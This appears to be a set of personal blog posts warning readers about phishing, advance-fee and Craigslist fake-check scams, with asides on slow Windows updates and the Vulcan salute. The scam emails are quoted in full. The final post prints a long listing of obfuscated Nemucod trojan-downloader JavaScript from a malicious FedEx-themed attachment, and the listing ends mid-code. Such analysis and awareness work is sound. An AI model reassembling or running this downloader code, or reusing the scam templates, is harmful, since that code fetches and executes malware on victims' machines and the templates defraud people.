Not from Chase: Watch the URLs

scam-alerts2

It goes without saying that this email is NOT from Chase.


From: chase.online2@verizon.net
Subject: Chase Online Important Alert : Action Required

To: Undisclosed recipients: ;

Chase Online Logo

We’ve Updated Our Online Access Statement

Dear Customer:

Technical se rv ices of the Chase online  are carrying out a planned statement upgrade. We earnestly ask you to visit the following link to start the procedure of confirmation on customers data.

To get started, please click the link below:

please visit our secure server web form by Click here to get started

Sincerely

Customer Service
©2015 JPMorgan Chase & Co.

1) First red flag: To “Undisclosed Recipients.”  If you’re getting an email from your bank, it will be addressed to you and not to everyone in the world.

2) Next red flag: Nigerian English:

  • Technical se rv ices of the Chase online
  • “We earnestly ask you to visit”
  • Start the procedure of confirmation on customers data

Nobody at Chase ever  wrote such a bad email. If it sounds wrong, it is wrong.

3) Next red flag: Banks will never ask you to divulge confidential information on the internet. They just won’t.

4) Most importantly, look where you go when you click the link:

http://schlatterhof.ch/junk/Capt/index.htm (I broke the link so you can’t accidentally go to the fraudulent website.)

That is a lot different from the real URL you should be seeing when you go to Chase:

https://chaseonline.chase.com/

A bank should always have an “https” URL, which indicates secure data transmission. These turdcaskets didn’t even try to make the web address look like something from Chase.

Be aware. Be Careful. Practice safe computing.

The Old Wolf has spoken

Two Scams Today: Be Careful Out There.

Scam 1: Benin Fraud

Seems that Benin is rapidly replacing Nigeria as the source of these scam letters.

Subject: Attn Please!
From: McAllen-Miller <wudept5@gmail.com>
To: undisclosed-recipients:;

Attn Please,

I am commissioner McAllen-Miller the director of international airport Texas United States. Due to the illegal operations of fraudsters in this country America our council with the united Nation forum has established to help you and other scam victims recover your funds and consignments boxes here in America. So far now, we have recovered 100 consignment boxes abandoned in our airport ware house and an other 50 consignment boxes apprehended from illegal fake diplomats.

Due to the petitions received by the formal UN boss secretary general-general Kofi Annan from all over the continent in regards to the fraudulent activities going on in America sub-region with the Security’s agent and diplomats who has been delaying people’s funds and gold hold, consignments and valuables in their custody are demand to be releases to their owners.

I am commissioner McAllen-Miller the director of international airport Texas, McAllen-Miller commissioner of international airport Texas United States for peace keeping, appointed by the new government of (NDC) president professor Vickie Sutton, I have included Your name into the beneficiary files of scam victims for release of 2 consignment boxes valuable of $95million us dollars and 85kilograms of gold deliver to you from the cargo department of the united nation diplomatic courier service here in 100 South International Boulevard Progreso, TX 78579 United State.

The $95 Million is from the UN compensation/bailout funds for citizens of UN member countries and citizens of commonwealth Nations for Poverty alleviation during this economic crunch and recession. The sum of $7 trillion was shared amongst 215 companies and individuals. You were awarded the fund for investment to ease the economic crunch and to be profitable and help others in need as a measure to ease the present economic hardship.

So according to our agreement with the United Nations including the origin of your fund in Benin Republic all our communications should be on email for record purpose so you are advice to follow the instruction immediately for your own good and future.

You are therefore advice to submit all your information for onward delivery of your 2 register Consignment boxes deliver to you.

Passport id.
Full name.
Home or office address.
Direct telephone number/mobile number.
Fax number.
Country of origin.

Please kindly note the below important registration details of your
(2) consignment boxes

The registration no………………………. gil/am/xxx21/0x
The batch number of the boxes……………….gil/ am/xxx54/0x
Security code number…………………… ..sfss/am942054/02
Serial no………………………. …..0043687/eb.

You are advise to act fast in receipt of this email to you and any further delay will be the pleasure of the Unhrc to use your fund to help the displaced people in Darfur and you are also advice to stop any illegal transaction because we have place our net working on you in any transaction you may likely participant on.

For further negotiation to enhance the completion of this transaction, you will contact the united Nation diplomatic base (U.N.D.B) for delivery of your 2 consignment boxes to you after you complete the payment of $80 us dollars for the endorsement fees for the signatory of the Texas international airport Authority . a NOTE YOU ARE ADVICE TO DIRECT THE FEE TO BENIN AS ORIGINATED OF YOUR BOXES VIA WESTERN UNION OR MONEY GRAM.

Receiver’s name: JULIUS CHUKUWMA
COUNTRY: BENIN REPUBLIC
CITY: COTONOU
TEXT QUESTION:URGENT
ANSWER: TODAY
AMOUNT $80.00 USD.

Best regards.

Commissioner McAllen-Miller
The director of international airport TX.

No, Julius, I don’t think I’ll be sending you any money today. Just go ahead and claim those boxes for yourself, and feel free to spend all the money they contain:

images

Scam 2: Craigslist scammer

I have about ten items up on Craigslist – here’s an inquiry (which was full of red flags, but I answered anyway, just in case it was an honest buyer.

Sorry, I just saw your Cl Post now. how much are you willing to sell it last, but will like to meet with you in person first before payment,will that be possible? As far as meeting goes,Today and tomorrow works. I’ll be available by 4-5ish…if that works for you? contact through, ernestinecuttercbo@yahoo.com  n let me know if you wanna set up day n time to meet,.please let me know whether or not you’d like me to come by today or tomorrow… thanks so much!
The English is typically Nigerian-scammerese, but I answered:
To: ernestinecuttercbo@yahoo.com
Subject: Craigslist response
I saw your answer via email about the [item]. Where are you located?
I would be able to meet today if that works for you.
Back comes the response, almost immediately – from a different email address:

Hello! let’s do like this, actually now I’m not in town for now, I came to visit my son so I wont be able to meet with you but am ok with the condition as seen on the advert, I’ll proceed in issuing a Check out to you and when you received the check, I will make arrangement for pick-up. So get back to me with below details asap.

Name:
Address:
City:
State:
Postal Code:
Phone Number:
Last Asking Price:

And as soon as this is provided, the payment will be overnight to you and I will let you know when its mailed out. I need you to be honest with the sale as I am a God fearing person

** N.B UPS does not deliver to P.O box addresses.

Sincerely,

That check, of course, would be bogus – and for a lot more money than I was asking for the item, like this one:

Ben Carson Bogus Check 2

All I would have to do is deduct my sale price and send the rest to the scumbag’s “shipping agent.”

Naturally, the drone didn’t even bother to read the advert, or he would have seen this:

Cash-only sale, no shipping agents, PayPal or Western Union money transfers.

I sent my prospective buyer a letter full of implications about his parentage and suggesting a few choice anatomical exercises.

These people frost my chops – and far, far too many are taken advantage of. Please talk to your loved ones who are using local classified boards or Craigslist, and show them that they are at risk to be scammed if they are not careful.

38_021022_nigerianemailmain.jpg.CROP.original-original

The Old Wolf has spoken.

Why are Windows updates so bloody slow?

I wondered the same thing yesterday, as Windows chose a very inopportune time to shut my system down, do it’s thing, restart, do it’s thing, and finally re-boot. There were 17 updates waiting to install, and over 24,000 registry entries to be updated. The whole process took about half an hour.

Doing a little poking around, I found a very interesting take on the situation at the Microsoft community. I thought I’d post it here, as a lot of people don’t visit these tech fora.


From user xp.client; this was written in 2012, but the situation does not seem to have improved much since then.

Okay maybe some background on the root of the problem would help. Windows XP used a fast and great mechanism called Hotfix Installer (Update.exe) to install updates. Updates installed in very little time (if you want to even reduce update time on XP, temporarily stop the System Restore service) and updates will install at crazy speeds because it doesn’t waste time creating a restore point for every update. Hotfix installer works by simply installing a new version of files to be updated at C:\Windows\system32 and C:\Windows\system32\dllcache (the Windows File Protection cache). This is File Based Servicing. The hotfix installer (Update.exe) also supported various command line switches like /nobackup which means not to backup files it patches as you won’t be uninstalling any updates and would save disk space by not backing files up. It also supported the ability to slipstream a service pack or update into the original XP setup files using the /s switch.

When Microsoft was developing Windows Vista, they realized that components had gotten too many interdepencies on each other and to service/patch each file reliably without breaking another component that relied on it, Microsoft introduced what they called as Component Based Servicing (CBS) (read all about it in The Servicing Guy’s blog: http://blogs.technet.com/b/joscon/). What it does basically is it installs the entire OS’s all files including all languages and all drivers shipped with the OS into C:\Windows\WinSxS and then it hard links files from there to C:\Windows\system32. Whenever an update is installed, it no longer installs it to C:\Windows\system32 and C:\Windows\system32\dllcache like XP’s hotfix installer (Update.exe) did. Instead, it updates the files in C:\Windows\WinSxS. Now WinSxS can contain multiple copies of the same file if it is used by more than 1 Windows component. The higher the number of components, that many number of times the file exists in C:\Windows\WinSxS.

When a Vista or Windows 7 update (.MSU) is installed, the components get updated, each and every one, instead of files and the worst part is it still maintains the older backup of the previous versions of components. It does not give the user to not backup the earlier versions like XP’s /nobackup switch. As as you install more and more updates on your system, they will take more and more disk space. The very reason Windows 7 is bloated and updates take so long is because of this servicing mechanism it uses (Component Based Servicing).

Microsoft’s ingenious “solution” to this problem of ever growing disk space is that they tell you to install fewer updates to keep the size of the servicing store under control. Of course, one can’t deny installing security updates and leave their system open to security holes so the cost of fixing bugs by installing hotfixes comes at the price of enormous amounts of disk space. The whole servicing stack is more of a downgrade to XP’s update.exe method. It causes slow logoff and slow logon (Please wait while Windows configures NONSENSE), heavy disk thrashing upon logon and logoff when updates are installed and systems being unable to boot because of failed updates. Another huge issue it introduced is the inability to do a true slipstream of service packs and hotfixes.

The time Windows 7/Vista take to install hotfixes compared to Windows XP is completely unacceptable. First it is searching for whether the update applies to your system for a long time. Then that post-installation process (“Configuring updates… Do not turn off your computer”) that takes several minutes before shut down followed by a second post-installation process (configuration) upon restart before logon that also takes also several minutes and thrashes the disk. The solution is to stay with Windows XP. I can install service pack 3 on my XP is about 10 minutes after downloading it. I can also install a slipstreamed with SP3 and all updates copy of XP is about 30 minutes on a modern fast PC. If you have to use Windows 7 or Vista, you will have to be stuck with this slow update non-sense as Microsoft does not even acknowledge that there is any slowdown or loss of functionality.

The fact remains: MSU updates are slow as **** and take too much time and as Windows 7 gets older and MS stops producing service packs, a clean install is going to take longer and longer to bring it up-to-date with all patches installed. Take the case of Vista today. First you have to install Windows Vista, then SP1 which takes about 60-70 minutes, then SP2 and then install all the dozens of post-SP2 SLOW UPDATES. It’s not worth wasting your time on an OS whose servicing mechanism Microsoft completely screwed up. I recommend you read more about the servicing and how it works at The Servicing Guy’s blog:http://blogs.technet.com/b/joscon/

Microsoft’s response to this is vague – they simply state “Windows 7’s servicing is more reliable than Windows XP” but they cannot acknowledge it is a million times slower and still unreliable… slow to the point of being unusable and sometimes leaving systems in an unbootable damaged state. Of course they know all this too but can’t admit it since it makes their latest OSes look poor. Moving from a very simple and fast update mechanism that worked to a complex one that requires endless “configuring” and repair  is a product engineering defect.

Take a look at servicing-related complaints in Microsoft’s own forums:

1. Very slow install of updates to Windows 7
2. Windows 7 – Updates are very slow
3. Windows 7 Ultimate, it takes long time configuring updates
4. “Preparing To Configure Windows. Please Do Not Turn Off Your Computer”
5. Very slow update install at shutdown (Windows 7 Home Premium)
6. Why does my computer run so slow when installing updates?
7. Every time the computer is shut down, it always says installing update do not turn off your computer
8. Computer is working slow and wants to do windows updates all the time
9. Windows 7 Update install time taking a very long time
10. Windows wants to install 6 updates every time I log off or put the computer in sleep mode
11. Problem In Configuring Windows Updates at the time of Startup
12. Computer really slow after latest updates
13. Windows hangs up in “configuring updates”
14. Why can’t windows 7 install updates?
15. Every time computer is shut down, receive Installing updates, do not shut off….
16. How long does it take for the Windows 7 Home Premium updates take?
17. Windows 7 “Installing Update 2 of 2” for 12 hours now
18. Updates causes endless reboots
19. Updates stuck installing for over 24 hrs. Computer does not boot
20. Cannot load Windows 7 after installing 2 critical updates


Not really a lot that can be done about this, but at least it’s good to know what the root of the problem is, and that it’s not just my system.

The Old Wolf has spoken

Reblog: Live Long and Prosper

The image popped up on Facebook; a bit of digging brought me to this post from Mantilla and Converse, which I thought was worth sharing in its entirety:

tumblr_n00ztz8w1z1sijk17o1_500

בשמאלה עושר וכבוד – in her left hand riches and honor

Happy are those who find wisdom,
and those who get understanding,
for her income is better than silver,
and her revenue better than gold.
She is more precious than jewels,
and nothing you desire can compare with her.

Long life is in her right hand;

in her left hand are riches and honor.

Her ways are ways of pleasantness,

and all her paths are peace.

She is a tree of life to those who lay hold of her;

those who hold her fast are called happy.

– Proverbs 3:13-18

The gesture depicted is one of priestly blessing used in certain Jewish services, and was also the inspiration for the Vulcan salute in the Star Trekfranchise:

In his autobiography I Am Not Spock, [Leonard] Nimoy wrote that he based [the Vulcan salute] on the Priestly Blessing performed byJewish Kohanim with both hands, thumb to thumb in this same position, representing the Hebrew letter Shin (ש), which has three upward strokes similar to the position of the thumb and fingers in the salute. The letter Shin here stands for Shaddai, meaning “Almighty (God)”. Nimoy wrote that when he was a child, his grandfather took him to an Orthodox synagogue. There he saw the blessing performed and was very impressed by it.

The mosaic depicted is from the Synagogue of Enschede in The Netherlands.

ETA: It just occurred to me that “Long life is in her right hand; in her left are riches and honor” is rather similar to “Live long and prosper”.

Again: Don’t click on email attachments from unknown people.

This cannot be stressed enough: Don’t click on email attachments from unknown people.

Edit: Friends have pointed out that it’s best to be wary of attachments appearing to be from people you know, if you aren’t expecting one. Contact lists can be stolen and people impersonated.

pc-trojan

Yesterday this email showed up in my inbox:

To: [edited]
Subject: We could not deliver your parcel, #00576180
From: “FedEx International Ground” <allan.horton@web2.pnet.xcon.it>

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Sincerely,
Allan Horton,
Operation Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.

Attached to the email was a file called “FedEx_ID_00576180.zip.”

Curious as ever, in an isolated environment I unpacked the zip file, and the result was immediately flagged and quarantined by Microsoft Security Essentials as containing the file “FedEx_ID_00576180.doc.js,” which contained “TrojanDownloader:JS/Nemucod.F

What that means is that this is a javascript file containing executable code which would go out to the internet and download horrible things onto your computer – adware, keyloggers, botnet software, or even never-sufficiently-to-be-damned ransomware like Cryptolocker which could encrypt all your files and demand hundreds of dollars for a decryption key.

When I examined the file contents, it looked like this:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };  function iiiiiiiiiiiiiiii(){ccccc += ‘ction’; tttttttttttttt(); };  function ggggggggggggggg(){ccccc += ‘e();’; xxxxxxxxx(); };  function fffffff(){ccccc += ‘= w’; llllll(); };  function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };  function gggggggggggggggg(){ccccc += ‘(“WS’; qqqqqqqqqqqqq(); };  function zzzzzzzzzzzz(){ccccc += ‘t.php’; llllllllllllll(); };…

In other words, it looked like garbage. Refuse. Filth. Muck. Boo! Boo! Booooooo! But when I massaged the file a little, putting each “function” call on a new line, this is what came out:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };
function iiiiiiiiiiiiiiii(){ccccc += ‘ction’; tttttttttttttt(); };
function ggggggggggggggg(){ccccc += ‘e();’; xxxxxxxxx(); };
function fffffff(){ccccc += ‘= w’; llllll(); };
function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };
function gggggggggggggggg(){ccccc += ‘(“WS’; qqqqqqqqqqqqq(); };
function zzzzzzzzzzzz(){ccccc += ‘t.php’; llllllllllllll(); };
function jjjjjjjj(){ccccc += ‘dys’; zzzzzzzz(); };
function pppppppppp(){ccccc += ‘dl(51’; llllllll(); };
function xxxxxxxxxxxx(){ccccc += ‘ xa’; hhhhhhhhhhhhhh(); };
function ssssssssssss(){xx += ‘a’; ccccc += ‘n ‘; gggggggggg(); };
function wwwwwwwwwww(){ccccc += ‘de(92’; ssssssssssssssss(); };
function bbbbbbbbb(){ccccc += ‘bluee’; jjjjjjjjj(); };
function qqqqqqqqqqqqqq(){ccccc += ’00’; iiiiiiiiii(); };
function eeeeeeeee(){ccccc += ‘iv’; wwwwwwww(); };
function eeeeeeeeee(){ccccc += ‘ySt’; ggggggg(); };
function vvvvvvvvvvvvvv(){ccccc += ‘o.sta’; wwwwwww(); };
function pppppppppppppppp(){ccccc += ‘; ‘; aaaaaaaaaaaaa(); };
function ddddddddddddddd(){ccccc += ‘) ‘; ppppppp(); };
function dddddddddd(){ccccc += ‘ct’; ssssssssssssss(); };
function pppppp(){ccccc += ‘arCo’; wwwwwwwwwww(); };
function xxxxxxxxxxxxxx(){ccccc += ‘ze’; aaaaaaaaaa(); };
function iiiiiii(){ccccc += ‘ength’; gggggggggggg(); };
function yyyyyy(){ccccc += ‘r xo ‘; cccccccc(); };
function pppppppppppppp(){ccccc += ‘a.p’; mmmmmmm(); };
function uuuuuuuuuuu(){ccccc += ‘ariau’; iiiiiiiiiiiiiiii(); };
function ggggggggggg(){ccccc += ‘y)’; pppppppppppppppp(); };
function pppppppppppp(){ccccc += ‘E0707’; qqqqqqqqqqqqqq(); };
function nnnnnn(){ccccc += ‘.nidh’; nnnnnnnnnnnnnnnn(); };
function jjjjjjjjjjj(){ccccc += ‘0B’; eeeeeeeeeeeeeeee(); };
function fffffffffffffff(){ccccc += ‘ound’; hhhhhhhhhh(); };
function mmmmmmmmmmmmmm(){ccccc += ‘ry’; mmmmmmmm(); };
function lllllllllll(){ccccc += ‘ A’; dddddddddd(); };
function xxxxxxxxxx(){ccccc += ‘ }; ‘; ggggggggg(); };
function llllllllllllll(){ccccc += ‘?r’; ddddddddddd(); };
function ccccccccc(){ccccc += ‘A01’; oooooo(); };
function zzzzzzzzzzzzzzzz(){ccccc += ‘xe”; ‘; rrrrrrrrrrrr(); };
function ttttttttttttttt(){ccccc += ‘SXML2’; jjjjjjjjjjjj(); };
function xxxxxxxxxxxxx(){ccccc += ‘} cat’; ccccccccccccc(); };
function jjjjjjjjj(){ccccc += ‘cho’; hhhhhhh(); };
function qqqqqqqq(){ccccc += ‘ct’; nnnnnnnnnnnnnn(); };
function zzzzzzzzzzz(){ccccc += ‘050A2’; rrrrrrrr(); };
function vvvvvvvvvvvvv(){ccccc += ‘dn ‘; lllllllll(); };
function nnnnnnnn(){ccccc += ‘ } ‘; hhhhhhhhhhhhhhhh(); };
function aaaaaaaaaaaa(){ccccc += ‘xo.op’; kkkkkkkkkkk(); };
function sssssssssssss(){ccccc += ‘ (xa’; xxxxxxxx(); };
function hhhhhhhhhhh(){ccccc += ‘ xa.’; qqqqqqqqqqqqqqqq(); };
function wwwwwwww(){ccccc += ‘eX’; ddddddddddddd(); };
function kkkkkkk(){xx += ‘v’; ccccc += ‘tio’; ssssssssssss(); };
function uuuuuuuuuuuuuuuu(){ccccc += ‘eXObj’; bbbbbbbbbb(); };
function ggggggg(){ccccc += ‘ate’; zzzzzzzzzzzzz(); };
function ffffffffffffff(){ccccc += ‘”&id’; ddddddd(); };
function rrrrrrrr(){ccccc += ‘407’; jjjjjjjjjjj(); };
function vvvvvvvv(){ccccc += ‘.read’; eeeeeeeeee(); };
function zzzzzzzzz(){ccccc += ‘515’; pppppppppppp(); };
function sssssssssss(){ccccc += ‘ndom(‘; iiiiiiiiiiii(); };
function cccccccccccc(){ccccc += ‘ent’; bbbbbbbbbbbbbbbb(); };
function rrrrrrrrrr(){ccccc += ‘en()’; sssssss(); };
function iiiiiiiiiiii(){ccccc += ‘)*100’; dddddddddddd(); };
function kkkkkkkkkk(){ccccc += ‘ A’; qqqqqqqq(); };
function qqqqqqqqqqqq(){ccccc += ‘%TEMP’; aaaaaaaa(); };
function mmmmmmmmmmmmm(){ccccc += ‘ct(“M’; ttttttttttttttt(); };
function ccccccc(){ccccc += ‘”h’; rrrrrrrrrrrrrr(); };
function sssssssss(){ccccc += ‘= 1)’; xxxxxxxxxxxxxxx(); };
function cccccccccc(){ccccc += ‘e(xo’; bbbbbbbb(); };
function rrrrrrrrrrrrrrr(){ccccc += ‘ =’; ffffffffffff(); };
function rrrrrrrrrrrr(){ccccc += ‘var’; lllllllllllll(); };
function xxxxxxxx(){ccccc += ‘.si’; xxxxxxxxxxxxxx(); };
function ggggggggggggg(){ccccc += ‘104A0’; ccccccccc(); };
function mmmmmmmmmm(){ccccc += ‘= 1; ‘; kkkkkkkkkkkkk(); };
function bbbbbbbbbbbbbbb(){ccccc += ‘ b’; rrrrrrrrrrrrrrr(); };
function wwwwwww(){ccccc += ‘tu’; tttttttttttt(); };
function sssssss(){ccccc += ‘; xa.’; uuuuuu(); };
function lllllllll(){ccccc += ‘= 1;’; qqqqqqqqqq(); };
function llllll(){ccccc += ‘s.’; ttttttttttt(); };
function rrrrrrrrrrrrrrrr(){ccccc += ‘ar ‘; ssssss(); };
function uuuuuuuuuuuuuuu(){ccccc += ‘ngs’; nnnnnnn(); };
function gggggggggggg(){ccccc += ‘; ‘; lllllll(); };
function fffffffff(){ccccc += ‘r+’; ffffffffffffff(); };
function jjjjjjjjjjjjjjj(){ccccc += ‘.e’; zzzzzzzzzzzzzzzz(); };
function dddddd(){ccccc += ‘ech’; qqqqqq(); };
function eeeeeeee(){ccccc += ‘&& x’; vvvvvvvvvvvvvv(); };
function uuuuuuuu(){xx += ‘e’; ccccc += ‘func’; kkkkkkk(); };
function aaaaaaaaaaaaaa(){ccccc += ‘[i]’; uuuuuuuuuuuuuu(); };
function qqqqqqqqqqqqqqq(){ccccc += ‘o.sen’; wwwwwwwwwwwwww(); };
function ssssssssss(){ccccc += ‘; for’; llllllllllllllll(); };
function lllllllllllll(){ccccc += ‘ dn ‘; dddddddddddddd(); };
function aaaaaaaaaaaaaaa(){ccccc += ‘.Ru’; ccccccccccccccc(); };
function ppppppp(){ccccc += ‘{ va’; qqqqqqqqq(); };
function rrrrrrrrr(){ccccc += ‘r ws ‘; llllllllllll(); };
function bbbbbbbb(){ccccc += ‘.Resp’; mmmmmmmmm(); };
function jjjjjjjjjjjjjj(){ccccc += ‘pt.S’; aaaaaaaaaaaaaaaa(); };
function cccccccccccccc(){ccccc += ‘000’; uuuuuuuuuuuuu(); };
function cccccccccccccccc(){ccccc += ‘it’; bbbbbbbbbbbbb(); };
function xxxxxx(){ccccc += ‘);’; bbbbbbbbbbbb(); };
function ssssss(){ccccc += ‘i=0;’; yyyyyyyyyyyyy(); };
function yyyyyyyyyyyyyyy() { this[xx](ccccc); };
function llllllllllllllll(){ccccc += ‘ (v’; rrrrrrrrrrrrrrrr(); };
function iiiiii(){ccccc += ‘)+S’; hhhhhh(); };
function eeeeeeeeeeee(){ccccc += ‘od’; ggggggggggg(); };
function ccccccccccc(){ccccc += ‘h.r’; fffffffffffffff(); };
function zzzzzz(){ccccc += ‘}; ‘; llllllllll(); };
function aaaaaaaaaaaaaaaa(){ccccc += ‘hell’; pppppppp(); };
function gggggggg(){ccccc += ‘0;’; bbbbbbbbbbbbbb(); };
function hhhhhhhh(){ccccc += ‘B.S’; bbbbbbb(); };
function pppppppp(){ccccc += ‘”); v’; kkkkkkkkkkkkkk(); };
function wwwwwwwwwwwww(){ccccc += ‘nd’; jjjjjjjjjj(); };
function iiiiiiiiii(){ccccc += ’01’; sssssssssssssss(); };
function gggggggggg(){xx += ‘l’; ccccc += ‘dl(fr’; kkkkkkkk(); };
function nnnnnnn(){ccccc += ‘(“‘; qqqqqqqqqqqq(); };
function vvvvvvvvvvvvvvv(){ccccc += ‘oF’; yyyyyyyyy(); };
function iiiiiiii(){ccccc += ‘.f’; ttttttttttttt(); };
function jjjjjj(){ccccc += ‘} }; ‘; pppppppppp(); };
function wwwwwwwwww(){ccccc += ‘om”‘; jjjjjjjjjjjjjjjj(); };
function mmmmmmmm(){ccccc += ‘ { ws’; aaaaaaaaaaaaaaa(); };
function oooooooooooooo(){ccccc += ‘m”);’; hhhhhhhhhhh(); };
function ggggggggg(){ccccc += ‘try’; iiiiiiiiiii(); };
function vvvvvvvvv(){ccccc += ‘en’; zzzzzzzzzzzz(); };
function hhhhhh(){ccccc += ‘tring’; iiiiiiii(); };
function mmmmmmm(){ccccc += ‘ositi’; ttttttttt(); };
function eeeeeeeeeeeeeee(){ccccc += ‘ct’; gggggggggggggggg(); };
function qqqqqqqqqqqqqqqq(){ccccc += ‘op’; rrrrrrrrrr(); };
function ttttttttttttt(){ccccc += ‘ro’; ppppppppppp(); };
function nnnnnnnnn(){ccccc += ‘/”+b’; aaaaaaaaaaaaaa(); };
function hhhhhhh(){ccccc += ‘stud’; yyyyyyyyyyyyyy(); };
function eeeeeeeeeeeeee(){ccccc += ‘; ‘; jjjjjj(); };
function tttttttt(){ccccc += ‘reak’; eeeeeeeeeeeeee(); };
function jjjjjjjjjjjjj(){ccccc += ‘ (dn’; aaaaaaa(); };
function eeeeee(){ccccc += ‘a = n’; iiiiiiiiiiiiiii(); };
function vvvvvvvvvvvv(){ccccc += ‘};’; xxxxxxxxxxxx(); };
function zzzzzzz(){ccccc += ‘”AD’; ddddddddd(); };
function zzzzzzzzzz(){ccccc += ‘n ‘; fffffff(); };
function aaaaaaaa(){ccccc += ‘%”‘; iiiiii(); };
function hhhhhhhhhhhhhh(){ccccc += ‘.clos’; ggggggggggggggg(); };
function yyyyyyyyyyyyy(){ccccc += ‘ i’; fffffffffffff(); };
function eeeeeeeeeeeee(){ccccc += ‘f (xo’; vvvvvvvv(); };
function uuuuuuuuu(){ccccc += ‘ { i’; eeeeeeeeeeeee(); };
function qqqqqqqqqq(){ccccc += ‘ x’; pppppppppppppp(); };
function oooooooooo(){ccccc += ‘je’; mmmmmmmmmmmmm(); };
function iiiiiiiiiii(){ccccc += ‘ { ‘; aaaaaaaaaaaa(); };
function nnnnnnnnnn(){ccccc += ‘dl(20′; ffffffffff(); };
function aaaaaaaaa(){ccccc += ’00)’; hhhhhhhhhhhhhhh(); };
function hhhhhhhhhhhhhhhh(){ccccc += ‘catc’; ssssssss(); };
function kkkkkkkkk(){ccccc += ‘fn,1’; kkkkkk(); };
function nnnnnnnnnnnnnnnn(){ccccc += ‘og’; nnnnnnnnnnnnn(); };
function ffffff(){ccccc += ‘TTP”‘; xxxxxx(); };
function ooooooooooo(){ccccc += ‘lit’; hhhhhhhhh(); };
function mmmmmm(){ccccc += ‘= 0; ‘; iiiiiiiiiiiii(); };
function nnnnnnnnnnnnnn(){ccccc += ‘iv’; uuuuuuuuuuuuuuuu(); };
function bbbbbbbbbb(){ccccc += ‘ect(‘; zzzzzzz(); };
function hhhhhhhhhh(){ccccc += ‘(Ma’; xxxxxxxxxxxxxxxx(); };
function ssssssss(){ccccc += ‘h (e’; ppppppppp(); };
function nnnnnnnnnnnnn(){ccccc += ‘.com ‘; bbbbbbbbb(); };
function kkkkkkkkkkkkk(){ccccc += ‘xa.wr’; mmmmmmmmmmmm(); };
function oooooo(){ccccc += ’10″‘; rrrrrrr(); };
function aaaaaaa(){ccccc += ‘ =’; sssssssss(); };
function ssssssssssssssss(){ccccc += ‘)+Mat’; ccccccccccc(); };
function kkkkkkkkkkkkkkk(){ccccc += ‘.c’; wwwwwwwwww(); };
function ddddddddd(){ccccc += ‘OD’; hhhhhhhh(); };
function iiiiiiiii(){ccccc += ‘”+f’; fffffffff(); };
function eeeeeeeeeeeeeeee(){ccccc += ‘09070’; hhhhhhhhhhhh(); };
function xxxxxxxxxxxxxxx(){ccccc += ‘ b’; tttttttt(); };
function yyyyyyyy(){ccccc += ‘n,2)’; ffffffffffffffff(); };
function mmmmmmmmmmmm(){ccccc += ‘it’; cccccccccc(); };
function bbbbbbbbbbbb(){ccccc += ‘ xo.o’; wwwwwwwww(); };
function llllllll(){ccccc += ’41’; vvvvvv(); };
function vvvvvvvvvvv(){ccccc += ‘ri’; uuuuuuuuuuuuuuu(); };
function zzzzzzzzzzzzz(){ccccc += ‘ ==’; aaaaaaaaaaa(); };
function hhhhhhhhhhhh(){ccccc += ‘517’; ggggggggggggg(); };
function tttttt(){ccccc += ‘r)’; ooooooo(); };
function ssssssssssssss(){ccccc += ‘ive’; dddddddddddddddd(); };
function fffffffffffff(){ccccc += ‘<b.l’; iiiiiii(); };
function qqqqqq(){ccccc += ‘ange ‘; nnnnnnnnnnnn(); };
function xxxxxxxxxxxxxxxx(){ccccc += ‘th.ra’; sssssssssss(); };
function qqqqqqqqqqqqq(){ccccc += ‘cri’; jjjjjjjjjjjjjj(); };
function ppppppppppp(){ccccc += ‘mCh’; pppppp(); };
function aaaaaaaaaa(){ccccc += ‘ > 5’; cccccccccccccc(); };
function ddddddd(){ccccc += ‘=545D’; zzzzzzzzz(); };
function jjjjjjjjjj(){ccccc += ‘Env’; yyyyyyyyyyy(); };
function aaaaaaaaaaaaa(){ccccc += ‘if’; sssssssssssss(); };
function iiiiiiiiiiiiiii(){ccccc += ‘ew’; kkkkkkkkkk(); };
function qqqqqqqqqqq(){ccccc += ‘; ‘; xxxxxxxxxxxxx(); };
function hhhhhhhhhhhhh(){ccccc += ‘lse)’; kkkkkkkkkkkk(); };
function nnnnnnnnnnnn(){ccccc += ‘= ‘; ooooooooooooo(); };
function dddddddddddddddd(){ccccc += ‘XObje’; eeeeeeeeeeeeeee(); };
function kkkkkkkk(){ccccc += ‘) { ‘; uuuuuuuuuu(); };
function ooooooooo(){ccccc += ‘200’; ddddddddddddddd(); };
function xxxxxxxxx(){ccccc += ‘ };’; xxxxxxxxxx(); };
function jjjjjjjjjjjjjjjj(){ccccc += ‘.sp’; ooooooooooo(); };
function kkkkkkkkkkkk(){ccccc += ‘; x’; qqqqqqqqqqqqqqq(); };
function kkkkkkkkkkkkkk(){ccccc += ‘ar f’; zzzzzzzzzz(); };
function jjjjjjjjjjjj(){ccccc += ‘.XMLH’; ffffff(); };
function zzzzzzzz(){ccccc += ‘tat’; dddddd(); };
function rrrrrrr(){ccccc += ‘ ,fa’; hhhhhhhhhhhhh(); };
function wwwwwwwww(){ccccc += ‘nrea’; jjjjjjjj(); };
function wwwwwwwwwwwwww(){ccccc += ‘d();’; nnnnnnnn(); };
function hhhhhhhhh(){ccccc += ‘(” “)’; ssssssssss(); };
function yyyyyyyyyyyyyy(){ccccc += ‘ios’; kkkkkkkkkkkkkkk(); };
function ppppppppp(){ccccc += ‘r) {‘; zzzzzz(); };
function bbbbbbbbbbbbbb(){ccccc += ‘ va’; yyyyyy(); };
function vvvvvvvvvvvvvvvv(){ccccc += ‘com p’; cccccccccccccccc(); };
function dddddddddddd(){ccccc += ‘0000’; aaaaaaaaa(); };
function lllllll(){ccccc += ‘i++)’; qqqqqqq(); };
function wwwwwwwwwwww(){ccccc += ‘ction’; oooooooooooooooo(); };
function zzzzzzzzzzzzzzz(){ccccc += ‘cum’; vvvvvvvvv(); };
function gggggg(){ccccc += ‘new’; lllllllllll(); };
function vvvvvv(){ccccc += ‘); ‘; nnnnnnnnnn(); };
function qqqqqqqqq(){ccccc += ‘r x’; eeeeee(); };
function ffffffffffff(){ccccc += ‘ “mun’; uuuuuuuuuuu(); };
function bbbbbbbbbbbbbbbb(){ccccc += ‘St’; vvvvvvvvvvv(); };
